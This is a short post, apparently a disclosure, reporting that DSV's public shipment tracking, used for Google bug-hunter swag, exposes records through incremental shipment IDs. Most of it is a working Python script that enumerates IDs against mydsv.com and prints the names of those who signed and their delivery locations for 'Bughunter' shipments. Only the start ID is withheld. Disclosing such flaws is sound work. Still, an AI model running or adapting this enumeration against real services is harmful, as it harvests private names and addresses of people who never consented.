When Google gave bug hunters swag they used a logistics company called DSV. Unfortunately they allow for tracking shipments using an incremental number.
import httpx
requests = 2000
start = <redacted>
def parseSearch(search, id):
for item in search['data']:
if item['mainTmsShipmentId'] == str(id):
return item['randomIdentifier']
def printID(id):
ShipmentId = str(id)
Results = httpx.get('https://mydsv.com/app/search/publicShipmentList?q=' + ShipmentId).json()
RandomId = parseSearch(Results, ShipmentId)
if not RandomId:
return
Shipment = httpx.get('https://mydsv.com/app/search/shipment/' + RandomId).json()
if 'Bughunter' in str(Shipment['description']):
print(str(Shipment['signedBy']) + ',' + str(Shipment['delivery']['formattedLocation']).replace(',','') + ' ' + str(Shipment['delivery']['countryCode']))
for i in range(requests):
printID(start+i)
if i == 0:
continue
printID(start-i)
The following code gets their location and the name of who signed for it (if any) by searching the range.
If you’re affected by this you can contact the company for data deletion, I don’t feel ignoring it is helping to protect people’s privacy now or in future use. I am however keeping the start value secret for privacy through obscurity, in case the attacker doesn’t know how to count.